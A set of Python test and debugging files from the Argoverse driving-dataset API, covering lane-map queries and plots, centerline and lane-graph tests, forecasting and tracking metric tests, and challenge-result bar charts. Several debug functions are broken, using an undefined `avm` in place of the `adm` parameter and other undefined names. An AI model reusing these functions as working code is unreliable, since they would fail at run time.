from argoverse.utils.json_utils import read_json_file
from argoverse.utils.mpl_plotting_utils import plot_lane_segment_patch
def add_lane_segment_to_ax(ax, lane_centerline, lane_polygon, patch_color, xmin, xmax, ymin, ymax):
"""
"""
plot_lane_segment_patch(lane_polygon, ax, color=patch_color, alpha=0.3)
def find_lane_segment_bounds_in_table(adm, city_name, lane_segment_id):
"""
"""
match_found = False
# find the lane segment inside the table
for table_idx, table_lane_id in avm.city_halluc_tableidx_to_laneid_map[city_name].items():
if lane_segment_id == table_lane_id:
match_found = True
break
if not match_found:
print("Failure -- Lane ID not found!")
quit()
(xmin, ymin, xmax, ymax) = avm.city_halluc_bbox_table[city_name][table_idx]
return xmin, ymin, xmax, ymax
def verify_halluc_lane_extent_index(enable_lane_boundaries=False):
"""
"""
avm = ArgoverseMap()
city_names = ["MIA", "PIT"]
for city_name in city_names:
# get all lane segment IDs inside of this city
lane_segment_ids = list(avm.city_lane_centerlines_dict[city_name].keys())
for lane_segment_id in lane_segment_ids:
xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(adm, city_name, lane_segment_id)
predecessor_ids = avm.get_lane_segment_predecessor_ids(lane_segment_id, city_name)
successor_ids = avm.get_lane_segment_successor_ids(lane_segment_id, city_name)
(r_neighbor_id, l_neighbor_id) = avm.get_lane_segment_adjacent_ids(lane_segment_id, city_name)
lane_centerline = avm.get_lane_segment_centerline(lane_segment_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(lane_segment_id, city_name)
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
# add the lane of interest
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "y", xmin, xmax, ymin, ymax)
if predecessor_ids is not None:
# add predecessors
for predecessor_id in predecessor_ids:
lane_centerline = avm.get_lane_segment_centerline(predecessor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(predecessor_id, city_name)
xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(adm, city_name, predecessor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "r", xmin, xmax, ymin, ymax)
if successor_ids is not None:
# add successors
for successor_id in successor_ids:
lane_centerline = avm.get_lane_segment_centerline(successor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(successor_id, city_name)
xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(adm, city_name, successor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "b", xmin, xmax, ymin, ymax)
# add left neighbor
if l_neighbor_id is not None:
lane_centerline = avm.get_lane_segment_centerline(l_neighbor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(l_neighbor_id, city_name)
xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(adm, city_name, l_neighbor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "g", xmin, xmax, ymin, ymax)
# add right neighbor
if r_neighbor_id is not None:
lane_centerline = avm.get_lane_segment_centerline(r_neighbor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(r_neighbor_id, city_name)
xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(adm, city_name, r_neighbor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "m", xmin, xmax, ymin, ymax)
if enable_lane_boundaries:
# Compare with Argo's proprietary, ground truth lane boundaries
gt_lane_polygons = avm.city_to_lane_polygons_dict[city_name]
for gt_lane_polygon in gt_lane_polygons:
dist = np.linalg.norm(gt_lane_polygon.mean(axis=0)[:2] - np.array([xmin, ymin]))
if dist < 30:
ax.plot(gt_lane_polygon[:, 0], gt_lane_polygon[:, 1], color="k", alpha=0.3, zorder=1)
ax.axis("equal")
plt.show()
datetime_str = generate_datetime_string()
plt.savefig(f"lane_segment_id_{lane_segment_id}_@_{datetime_str}.jpg")
plt.close("all")
def verify_manhattan_search_functionality():
"""
Minimal example where we
"""
adm = ArgoverseMap()
# query_x = 254.
# query_y = 1778.
ref_query_x = 422.0
ref_query_y = 1005.0
city_name = "PIT" # 'MIA'
for trial_idx in range(10):
query_x = ref_query_x + (np.random.rand() - 0.5) * 10
query_y = ref_query_y + (np.random.rand() - 0.5) * 10
# query_x,query_y = (3092.49845414,1798.55426805)
query_x, query_y = (3112.80160113, 1817.07585338)
lane_segment_ids = avm.get_lane_ids_in_xy_bbox(query_x, query_y, city_name, 5000)
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
# ax.scatter([query_x], [query_y], 500, color='k', marker='.')
plot_lane_segment_patch(pittsburgh_bounds, ax, color="m", alpha=0.1)
if len(lane_segment_ids) > 0:
for i, lane_segment_id in enumerate(lane_segment_ids):
patch_color = "y" # patch_colors[i % 4]
lane_centerline = avm.get_lane_segment_centerline(lane_segment_id, city_name)
test_x, test_y = lane_centerline.mean(axis=0)
inside = point_inside_polygon(
n_poly_vertices, pittsburgh_bounds[:, 0], pittsburgh_bounds[:, 1], test_x, test_y
)
if inside:
halluc_lane_polygon = avm.get_lane_segment_polygon(lane_segment_id, city_name)
xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(adm, city_name, lane_segment_id)
add_lane_segment_to_ax(
ax, lane_centerline, halluc_lane_polygon, patch_color, xmin, xmax, ymin, ymax
)
ax.axis("equal")
plt.show()
datetime_str = generate_datetime_string()
plt.savefig(f"{trial_idx}_{datetime_str}.jpg")
plt.close("all")
def verify_point_in_polygon_for_lanes():
"""
"""
avm = ArgoverseMap()
# ref_query_x = 422.
# ref_query_y = 1005.
ref_query_x = -662
ref_query_y = 2817
city_name = "MIA"
for trial_idx in range(10):
query_x = ref_query_x + (np.random.rand() - 0.5) * 10
query_y = ref_query_y + (np.random.rand() - 0.5) * 10
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
ax.scatter([query_x], [query_y], 100, color="k", marker=".")
occupied_lane_ids = avm.get_lane_segments_containing_xy(query_x, query_y, city_name)
for occupied_lane_id in occupied_lane_ids:
halluc_lane_polygon = avm.get_lane_segment_polygon(occupied_lane_id, city_name)
plot_lane_segment_patch(halluc_lane_polygon, ax, color="y", alpha=0.3)
nearby_lane_ids = avm.get_lane_ids_in_xy_bbox(query_x, query_y, city_name)
nearby_lane_ids = set(nearby_lane_ids) - set(occupied_lane_ids)
for nearby_lane_id in nearby_lane_ids:
halluc_lane_polygon = avm.get_lane_segment_polygon(nearby_lane_id, city_name)
plot_lane_segment_patch(halluc_lane_polygon, ax, color="r", alpha=0.3)
ax.axis("equal")
plt.show()
plt.close("all")
def plot_nearby_halluc_lanes(ax, city_name, adm, query_x, query_y, patch_color="r", radius=20):
"""
"""
nearby_lane_ids = avm.get_lane_ids_in_xy_bbox(query_x, query_y, city_name, radius)
for nearby_lane_id in nearby_lane_ids:
halluc_lane_polygon = avm.get_lane_segment_polygon(nearby_lane_id, city_name)
plot_lane_segment_patch(halluc_lane_polygon, ax, color=patch_color, alpha=0.3)
plt.text(halluc_lane_polygon[:, 0].mean(), halluc_lane_polygon[:, 1].mean(), str(nearby_lane_id))
def verify_lane_tangent_vector():
"""
debug low confidence lane tangent predictions
I noticed that the confidence score of lane direction is
pretty low (almost zero) in some logs
"""
POSE_FILE_DIR = "../debug_lane_tangent"
# both of these are Pittsburgh logs
log_ids = ["033669d3-3d6b-3d3d-bd93-7985d86653ea", "028d5cb1-f74d-366c-85ad-84fde69b0fd3"]
adm = ArgoverseMap()
city_name = "PIT"
for log_id in log_ids:
print(f"On {log_id}")
pose_fpaths = glob.glob(f"{POSE_FILE_DIR}/{log_id}/poses/city_SE3_egovehicle_*.json")
num_poses = len(pose_fpaths)
egovehicle_xy_arr = np.zeros((num_poses, 2))
for i, pose_fpath in enumerate(pose_fpaths):
json_data = read_json_file(pose_fpath)
egovehicle_xy_arr[i, 0] = json_data["translation"][0]
egovehicle_xy_arr[i, 1] = json_data["translation"][1]
for i, query_xy_city_coords in enumerate(egovehicle_xy_arr[::10, :]):
query_xy_city_coords = np.array([3116.8282170094944, 1817.1269613456188])
query_xy_city_coords = np.array([3304.7072308190845, 1993.1670162837597])
# start = time.time()
lane_dir_vector, confidence = avm.get_lane_direction(query_xy_city_coords, city_name, visualize=False)
# end = time.time()
# duration = end - start
# print(f'query took {duration} s')
# if confidence < 0.5:
print(f"\t{i}: {confidence}")
# if confidence == 0.:
# pdb.set_trace()
# This was an absolute failure case!
# lane_dir_vector, confidence = avm.get_lane_direction(query_xy_city_coords, city_name, visualize=True)
visualize = True
if visualize:
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
dx = lane_dir_vector[0] * 20
dy = lane_dir_vector[1] * 20
plt.arrow(query_xy_city_coords[0], query_xy_city_coords[1], dx, dy, color="r", width=0.3, zorder=2)
query_x, query_y = query_xy_city_coords
ax.scatter([query_x], [query_y], 100, color="k", marker=".")
# make another plot now!
plot_nearby_halluc_lanes(ax, city_name, adm, query_x, query_y)
ax.axis("equal")
plt.show()
plt.close("all")
def test_remove_extended_predecessors():
"""Test remove_extended_predecessors() for map_api"""
lane_seqs = [[9621385, 9619110, 9619209, 9631133], [9621385, 9619110, 9619209], [9619209, 9631133]]
xy = np.array([[-130.0, 2315.0], [-129.0, 2315.0], [-128.0, 2315.0]]) # 9619209 comntains xy[0]
city_name = "MIA"
avm = ArgoverseMap()
filtered_lane_seq = avm.remove_extended_predecessors(lane_seqs, xy, city_name)
assert np.array_equal(
filtered_lane_seq, [[9619209, 9631133], [9619209], [9619209, 9631133]]
), "remove_extended_predecessors() failed!"
def test_get_candidate_centerlines_for_traj():
"""Test get_candidate_centerlines_for_traj()
-180 . . . . . -100
2340
v
| .
| .
* (CL1) .
\
\
(CL2) \
>---------*-------------------->
s x x x x x x x x x e .
>--------------------------------------------> .
(CL3) 2310
"""
xy = np.array(
[[-130.0, 2315.0], [-129.0, 2315.0], [-128.0, 2315.0], [-127, 2315], [-126, 2315], [-125, 2315], [-124, 2315]]
)
city_name = "MIA"
avm = ArgoverseMap()
# import pdb; pdb.set_trace()
candidate_centerlines = avm.get_candidate_centerlines_for_traj(xy, city_name)
assert len(candidate_centerlines) == 3, "Number of candidates wrong!"
expected_centerlines = [
np.array(
[
[-131.88540689, 2341.87225878],
[-131.83054027, 2340.33723194],
[-131.77567365, 2338.8022051],
[-131.72080703, 2337.26717826],
[-131.66594041, 2335.73215142],
[-131.61107379, 2334.19712458],
[-131.55620718, 2332.66209774],
[-131.50134056, 2331.1270709],
[-131.44647394, 2329.59204406],
[-131.39160732, 2328.05701721],
[-131.39160732, 2328.05701721],
[-131.37997138, 2327.72338427],
[-131.36833545, 2327.38975132],
[-131.35669951, 2327.05611837],
[-131.34506358, 2326.72248542],
[-131.33342764, 2326.38885247],
[-131.32179171, 2326.05521952],
[-131.31015577, 2325.72158657],
[-131.29851984, 2325.38795362],
[-131.2868839, 2325.05432067],
[-131.2868839, 2325.05432067],
[-131.19279519, 2322.55119928],
[-130.98376304, 2320.05690639],
[-130.24692629, 2317.70490846],
[-128.37426431, 2316.09358878],
[-125.9878693, 2315.38876171],
[-123.48883479, 2315.29784077],
[-120.98715427, 2315.43423973],
[-118.48467829, 2315.55478278],
[-115.9822023, 2315.67532583],
[-115.9822023, 2315.67532583],
[-114.27604136, 2315.74436169],
[-112.56988042, 2315.81339756],
[-110.86371948, 2315.88243342],
[-109.15755854, 2315.95146928],
[-107.4513976, 2316.02050515],
[-105.74523665, 2316.08954101],
[-104.03907571, 2316.15857687],
[-102.33291477, 2316.22761274],
[-100.62675383, 2316.2966486],
]
),
np.array(
[
[-139.13361714, 2314.54725812],
[-136.56123771, 2314.67259898],
[-133.98885829, 2314.79793983],
[-131.41647886, 2314.92328069],
[-128.84409943, 2315.04862155],
[-126.27172001, 2315.1739624],
[-123.69934058, 2315.29930326],
[-121.12696116, 2315.42464412],
[-118.55458173, 2315.54998497],
[-115.9822023, 2315.67532583],
[-115.9822023, 2315.67532583],
[-114.27604136, 2315.74436169],
[-112.56988042, 2315.81339756],
[-110.86371948, 2315.88243342],
[-109.15755854, 2315.95146928],
[-107.4513976, 2316.02050515],
[-105.74523665, 2316.08954101],
[-104.03907571, 2316.15857687],
[-102.33291477, 2316.22761274],
[-100.62675383, 2316.2966486],
]
),
np.array(
[
[-178.94773558, 2309.75038731],
[-175.73132051, 2309.8800903],
[-172.51490545, 2310.00979328],
[-169.29849039, 2310.13949626],
[-166.08207532, 2310.26919925],
[-162.86566026, 2310.39890223],
[-159.64924519, 2310.52860522],
[-156.43283013, 2310.6583082],
[-153.21641506, 2310.78801118],
[-150.0, 2310.91771417],
[-150.0, 2310.91771417],
[-148.77816698, 2310.97013154],
[-147.55633396, 2311.0225489],
[-146.33450094, 2311.07496627],
[-145.11266792, 2311.12738364],
[-143.89083489, 2311.17980101],
[-142.66900187, 2311.23221837],
[-141.44716885, 2311.28463574],
[-140.22533583, 2311.33705311],
[-139.00350281, 2311.38947048],
[-139.00350281, 2311.38947048],
[-136.42679274, 2311.51113082],
[-133.85008268, 2311.63279117],
[-131.27337261, 2311.75445152],
[-128.69666254, 2311.87611187],
[-126.11995247, 2311.99777222],
[-123.54324241, 2312.11943257],
[-120.96653234, 2312.24109292],
[-118.38982227, 2312.36275327],
[-115.8131122, 2312.48441361],
[-115.8131122, 2312.48441361],
[-114.11040334, 2312.54102742],
[-112.40815545, 2312.6106056],
[-110.70605773, 2312.68440659],
[-109.00396, 2312.75820759],
[-107.30186227, 2312.83200858],
[-105.59976454, 2312.90580958],
[-103.89766681, 2312.97961057],
[-102.19556909, 2313.05341156],
[-100.49347136, 2313.12721256],
]
),
]
for i in range(len(expected_centerlines)):
assert np.allclose(expected_centerlines[i], candidate_centerlines[i]), "Centerline coordinates wrong!"
def test_dfs():
"""Test dfs for lane graph
Lane Graph:
9629626
/ \
/ \
9620336 9632589
(10.77) (8.33)
| |
| |
9628835 9621228
(31.9) (31.96)
| |
| |
9629406 9626257
(7.9) (7.81)
"""
lane_id = 9629626
city_name = "MIA"
dist = 0.0
threshold = 30.0
extend_along_predecessor = False
avm = ArgoverseMap()
lane_seq = avm.dfs(lane_id, city_name, dist, threshold, extend_along_predecessor)
expected_lane_seq = [[9629626, 9620336, 9628835], [9629626, 9632589, 9621228]]
assert np.array_equal(lane_seq, expected_lane_seq), "dfs over lane graph failed!"
```
#### File: argoverse-api/tests/make_cvpr20_argoverse_tracking_plots.py
```python
import collections
from collections import defaultdict
import copy
import csv
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pdb
import seaborn as sns
import scipy
from typing import Any, List, Mapping
from mseg.utils.csv_utils import read_csv
def make_forecasting_plots():
""" """
sns.set_style({'font.family': 'monospace'}) #'Times New Roman'})
plt.style.use('ggplot')
result_dict = get_forecasting_results()
# labels = [
# 'minADE (K=1)',
# 'minADE (K=6)'
# ]
# labels = [
# 'DAC (K=1)',
# 'DAC (K=6)'
# ]
# labels = [
# 'MR (K=1)',
# 'MR (K=6)'
# ]
# labels = [
# 'minFDE (K=1)',
# 'minFDE (K=6)'
# ]
# labels = [
# 'p-minADE (K=6)',
# 'p-minFDE (K=6)'
# ]
make_plot(result_dict, labels)
def make_tracking_plots():
""" """
sns.set_style({'font.family': 'monospace'}) #'Times New Roman'})
plt.style.use('ggplot')
result_dict = get_tracking_results()
# labels = ['C:MOTA', 'P:MOTA', 'C:IDF1', 'P:IDF1']
labels = ['C:MT', 'P:MT', 'C:ML', 'P:ML']
# # FPs and FNs decreased
# labels = ['C:FP','P:FP','C:FN','P:FN']
# # Effect of Speed
# labels = [
# 'C:MT',
# 'C:MT-FST',
# ]
# # Effect of Distance
# labels = [
# 'C:MT',
# 'C:MT-FAR',
# ]
# Effect of Occlusion
# labels = [
# 'C:MT',
# 'C:MT-OCC',
# 'P:MT',
# 'P:MT-OCC',
# ]
# labels = [
# 'C:FRG',
# 'P:FRG',
# ]
# labels = [
# 'C:FRG-FAR',
# 'P:FRG-FAR',
# 'C:SW-FAR',
# 'P:SW-FAR',
# 'C:FRG-OCC',
# 'P:FRG-OCC',
# 'C:SW-OCC',
# 'P:SW-OCC',
# 'C:FRG-FST',
# 'C:SW-FST',
# ]
# Effect on MOTP
# labels = [
# 'C:MOTPD',
# 'P:MOTPD',
# 'C:MOTPI',
# 'P:MOTPI',
# ]
# labels = [
# 'C:MOTPO',
# 'P:MOTPO',
# ]
make_plot(result_dict, labels)
def get_tracking_results():
""" """
fpath = '/Users/johnlamb/Downloads/cvpr-argoverse-tracking-winners.csv'
rows = read_csv(fpath, delimiter=',')
result_dict = defaultdict(list)
for i,row in enumerate(rows):
print(row['Team name'])
# 'Submission ID,Submitted at,AVG-RANK,
result_dict['Team name'] += [row['Team name']]
result_dict['C:MOTA'] += [float(row['C:MOTA'])]
result_dict['P:MOTA'] += [float(row['P:MOTA'])]
result_dict['C:MOTPD'] += [float(row['C:MOTPD'])]
result_dict['P:MOTPD'] += [float(row['P:MOTPD'])]
result_dict['C:MOTPO'] += [float(row['C:MOTPO'])]
result_dict['P:MOTPO'] += [float(row['P:MOTPO'])]
result_dict['C:MOTPI'] += [float(row['C:MOTPI'])]
result_dict['P:MOTPI'] += [float(row['P:MOTPI'])]
result_dict['C:IDF1'] += [100 * float(row['C:IDF1'])]
result_dict['P:IDF1'] += [100 * float(row['P:IDF1'])]
result_dict['C:MT'] += [100 * float(row['C:MT'])]
result_dict['P:MT'] += [100 * float(row['P:MT'])]
result_dict['C:ML'] += [100 * float(row['C:ML'])]
result_dict['P:ML'] += [100 * float(row['P:ML'])]
result_dict['C:FP'] += [int(row['C:FP'])]
result_dict['P:FP'] += [int(row['P:FP'])]
result_dict['C:FN'] += [int(row['C:FN'])]
result_dict['P:FN'] += [int(row['P:FN'])]
result_dict['C:SW'] += [int(row['C:SW'])]
result_dict['P:SW'] += [int(row['P:SW'])]
result_dict['C:FRG'] += [int(row['C:FRG'])]
result_dict['P:FRG'] += [int(row['P:FRG'])]
result_dict['C:MT-OCC'] += [100 * float(row['C:MT-OCC'])]
result_dict['C:MT-FAR'] += [100 * float(row['C:MT-FAR'])]
result_dict['C:ML-OCC'] += [100 * float(row['C:ML-OCC'])]
result_dict['C:ML-FAR'] += [100 * float(row['C:ML-FAR'])]
result_dict['C:FRG-OCC'] += [int(row['C:FRG-OCC'])]
result_dict['C:FRG-FAR'] += [int(row['C:FRG-FAR'])]
result_dict['C:SW-OCC'] += [int(row['C:SW-OCC'])]
result_dict['C:SW-FAR'] += [int(row['C:SW-FAR'])]
result_dict['C:MT-FST'] += [100 * float(row['C:MT-FST'])]
result_dict['C:ML-FST'] += [100 * float(row['C:ML-FST'])]
result_dict['C:FRG-FST'] += [int(row['C:FRG-FST'])]
result_dict['C:SW-FST'] += [int(row['C:SW-FST'])]
result_dict['P:MT-OCC'] += [100 * float(row['P:MT-OCC'])]
result_dict['P:MT-FAR'] += [100 * float(row['P:MT-FAR'])]
result_dict['P:ML-OCC'] += [100 * float(row['P:ML-OCC'])]
result_dict['P:ML-FAR'] += [100 * float(row['P:ML-FAR'])]
result_dict['P:FRG-OCC'] += [int(row['P:FRG-OCC'])]
result_dict['P:FRG-FAR'] += [int(row['P:FRG-FAR'])]
result_dict['P:SW-OCC'] += [int(row['P:SW-OCC'])]
result_dict['P:SW-FAR'] += [int(row['P:SW-FAR'])]
return result_dict
def get_forecasting_results():
""" """
fpath = '/Users/johnlamb/Downloads/cvpr-argoverse-forecasting-winners.csv'
rows = read_csv(fpath, delimiter=',')
result_dict = defaultdict(list)
for i,row in enumerate(rows):
print(row['Team name'])
result_dict['Team name'] += [row['Team name']]
result_dict['minADE (K=1)'] += [float(row['minADE (K=1)'])]
result_dict['minFDE (K=1)'] += [float(row['minFDE (K=1)'])]
result_dict['DAC (K=1)'] += [float(row['DAC (K=1)'])]
result_dict['MR (K=1)'] += [float(row['MR (K=1)'])]
result_dict['minADE (K=6)'] += [float(row['minADE (K=6)'])]
result_dict['minFDE (K=6)'] += [float(row['minFDE (K=6)'])]
result_dict['DAC (K=6)'] += [float(row['DAC (K=6)'])]
result_dict['MR (K=6)'] += [float(row['MR (K=6)'])]
result_dict['p-minADE (K=6)'] += [float(row['p-minADE (K=6)'])]
result_dict['p-minFDE (K=6)'] += [float(row['p-minFDE (K=6)'])]
return result_dict
def make_plot(result_dict, labels):
""" """
x = np.arange(len(result_dict['Team name'])) # the label locations
if len(labels) == 2:
centers = [-0.2,0.2]
width=0.4
else:
centers = np.linspace(-0.3, 0.3, len(labels) )
width = centers[1] - centers[0]
fig, ax = plt.subplots()
all_rects = []
colors = [ "#ECA154", "#007672", "#245464", "#78909c"] # "#595959"]# "#212121"] # "#d3e8ef" ]
for label, offset,color in zip(labels, centers, colors):
rects = ax.bar(x=x + offset, height=result_dict[label], width=width, label=label, color=color)
all_rects += [rects]
# colors = [ "#ECA154", "#007672", "#245464", "#d3e8ef" ]
# for rect,color in zip(rects, colors):
# rect.set_color(color)
# Add some text for labels, title and custom x-axis tick labels, etc.
# ax.set_ylabel('Error (degrees)')
#ax.set_title('Scores by group and gender')
ax.set_xticks(x)
# # rotate the labels with proper anchoring.
ha = 'right'
ax.set_xticklabels(result_dict['Team name'], rotation=45, ha=ha)
ax.legend(
loc='upper center',
# bbox_to_anchor=(1, 0.5)
bbox_to_anchor=(0.5, 1.3),
# bbox_to_anchor=(0.5, 1.0),
# shadow=True,
ncol=4,
)
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect in rects:
height = rect.get_height()
ax.annotate(f'{height:.2f}',
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
for rects in all_rects:
autolabel(rects)
fig.tight_layout()
plt.show()
if __name__ == '__main__':
""" """
#make_tracking_plots()
make_forecasting_plots()
```
#### File: argoverse-api/tests/test_eval_forecasting.py
```python
import numpy as np
from argoverse.evaluation.eval_forecasting import compute_metric
from numpy.testing import assert_almost_equal
def test_compute_metric():
"""Test computation of ADE and FDE"""
# Test Case:
# x: Ground Truth Trajectory
# *: Predicted Trajectory 1
# o: Predicted Trajectory 2
# 0 1 2 3 4 5 6 7 8 9 10 11 12
# 10
# 9
# * * * * * * * * * * * *
# 8 x x x x x
# 7 o o o o o x o
# 6 x o
# 5 x o
# 4 x o
# 3 x o
# 2 x o
# 1 x o
# 0
target_1 = np.array(
[
[1.0, 8.0],
[2.0, 8.0],
[3.0, 8.0],
[4.0, 8.0],
[5.0, 8.0],
[6.0, 7.0],
[7.0, 6.0],
[8.0, 5.0],
[8.0, 4.0],
[8.0, 3.0],
[8.0, 2.0],
[8.0, 1.0],
]
)
predicted_1_1 = np.array(
[
[1.0, 8.5],
[2.0, 8.5],
[3.0, 8.5],
[4.0, 8.5],
[5.0, 8.5],
[6.0, 8.5],
[7.0, 8.5],
[8.0, 8.5],
[9.0, 8.5],
[10.0, 8.5],
[11.0, 8.5],
[12.0, 8.5],
]
)
predicted_1_2 = np.array(
[
[1.0, 7.0],
[2.0, 7.0],
[3.0, 7.0],
[4.0, 7.0],
[5.0, 7.0],
[7.0, 7.0],
[8.0, 6.0],
[9.0, 5.0],
[9.0, 4.0],
[9.0, 3.0],
[9.0, 2.0],
[9.0, 1.0],
]
)
output_1 = [predicted_1_1, predicted_1_2]
target_2 = target_1
predicted_2_1 = predicted_1_1
output_2 = [predicted_2_1]
output = np.array([output_1, output_2])
target = np.array([target_1, target_2])
ade, fde, min_idx = compute_metric(output, target)
expected_ade = 2.006
expected_fde = 4.75
expected_min_idx = [1, 0]
assert_almost_equal(ade, expected_ade, 3)
assert_almost_equal(fde, expected_fde, 3)
np.array_equal(min_idx, expected_min_idx)
```
#### File: argoverse-api/tests/test_eval_tracking.py
```python
from collections import namedtuple, defaultdict
import numpy as np
import os
from pathlib import Path
import pdb
from scipy.spatial.transform import Rotation
import shutil
from typing import Tuple
from argoverse.utils.json_utils import save_json_dict
from argoverse.evaluation.eval_tracking import eval_tracks
_ROOT = Path(__file__).resolve().parent
def check_mkdir(dirpath):
""" """
if not Path(dirpath).exists():
os.makedirs(dirpath, exist_ok=True)
def yaw_to_quaternion3d(yaw: float) -> Tuple[float,float,float,float]:
"""
Args:
- yaw: rotation about the z-axis
Returns:
- qx,qy,qz,qw: quaternion coefficients
"""
qx,qy,qz,qw = Rotation.from_euler('z', yaw).as_quat()
return qx,qy,qz,qw
fields = ('l', 'w', 'h', 'qx', 'qy', 'qz', 'qw', 'cx', 'cy', 'cz', 'track_id', 'label_class')
TrackedObjRec = namedtuple('TrackedObjRec', fields, defaults=(None,) * len(fields))
class TrackedObjects:
def __init__(self, log_id: str, is_gt: bool):
""" """
self.ts_to_trackedlabels_dict = defaultdict(list)
self.log_id = log_id
tracks_type = 'gt' if is_gt else 'pred'
self.log_dir = f'{_ROOT}/test_data/'
self.log_dir += f'eval_tracking_dummy_logs_{tracks_type}/{self.log_id}'
def add_obj(self, o: TrackedObjRec, ts_ns: int):
"""
Args:
- ts_ns: timestamp in nanoseconds
"""
self.ts_to_trackedlabels_dict[ts_ns] += [
{
"center": {"x": o.cx, "y": o.cy, "z": o.cz},
"rotation": {"x": o.qx , "y": o.qy, "z": o.qz , "w": o.qw},
"length": o.l,
"width": o.w,
"height": o.h,
"track_label_uuid": o.track_id,
"timestamp": ts_ns, # 1522688014970187
"label_class": o.label_class,
}]
def save_to_disk(self):
"""
Labels and predictions should be saved in JSON e.g.
`tracked_object_labels_315969629019741000.json`
"""
for ts_ns, ts_trackedlabels in self.ts_to_trackedlabels_dict.items():
json_fpath = f'{self.log_dir}/per_sweep_annotations_amodal/'
check_mkdir(json_fpath)
json_fpath += f'tracked_object_labels_{ts_ns}.json'
save_json_dict(json_fpath, ts_trackedlabels)
def dump_scenario_json(centers, yaw_angles, log_id, is_gt, run_eval=True):
"""
Egovehicle stationary (represented by `o`).
Seqeuence of 4-nanosecond timestamps.
"""
t_objs = TrackedObjects(log_id=log_id, is_gt=is_gt)
l = 2
w = 2
h = 1
track_id = 'obj_a'
label_class = 'VEHICLE'
cx, cy, cz = centers[0]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[0])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=0)
cx, cy, cz = centers[1]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[1])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=1)
cx, cy, cz = centers[2]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[2])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=2)
cx, cy, cz = centers[3]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[3])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=3)
t_objs.save_to_disk()
if not run_eval:
return None
pred_log_dir = f'{_ROOT}/test_data/eval_tracking_dummy_logs_pred'
gt_log_dir = f'{_ROOT}/test_data/eval_tracking_dummy_logs_gt'
out_fpath = f'{_ROOT}/test_data/{log_id}.txt'
out_file = open(out_fpath, 'w')
eval_tracks(
path_tracker_output_root=pred_log_dir,
path_dataset_root=gt_log_dir,
d_min=0,
d_max=100,
out_file=out_file,
centroid_method="average",
diffatt=None,
category='VEHICLE'
)
out_file.close()
with open(out_fpath, 'r') as f:
result_lines = f.readlines()
result_vals = result_lines[0].strip().split(' ')
fn, num_frames, mota, motp_c, motp_o, motp_i, idf1 = result_vals[:7]
most_track, most_lost, num_fp, num_miss, num_sw, num_frag = result_vals[7:]
# Todo: change `num_flag` to `num_frag`
result_dict = {
'filename': fn,
'num_frames': int(num_frames),
'mota': float(mota),
'motp_c': float(motp_c),
'motp_o': float(motp_o),
'motp_i': float(motp_i),
'idf1': float(idf1),
'most_track': float(most_track),
'most_lost': float(most_lost),
'num_fp': int(num_fp),
'num_miss': int(num_miss),
'num_sw': int(num_sw),
'num_frag': int(num_frag),
}
shutil.rmtree(pred_log_dir)
shutil.rmtree(gt_log_dir)
return result_dict
def get_1obj_gt_scenario():
"""
Egovehicle stationary (represented by `o`).
Seqeuence of 4-nanosecond timestamps.
|-|
| |
|-|
|-|
| |
|-|
o (x,y,z) = (0,0,0)
|-|
| |
|-|
|-|
| | (x,y,z)=(-3,2,0)
|-|
"""
centers = []
# timestamp 0
cx = -3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0,0,0,0]
return centers, yaw_angles
def test_1obj_perfect():
""" """
log_id = '1obj_perfect'
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
centers = gt_centers
yaw_angles = gt_yaw_angles
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False, )
assert result_dict['num_frames'] == 4
assert result_dict['mota'] == 100.0
assert result_dict['motp_c'] == 0.0
assert result_dict['motp_o'] == 0.0
assert result_dict['motp_i'] == 0.0
assert result_dict['idf1'] == 1.0
assert result_dict['most_track'] == 1.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 0
assert result_dict['num_miss'] == 0
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 0
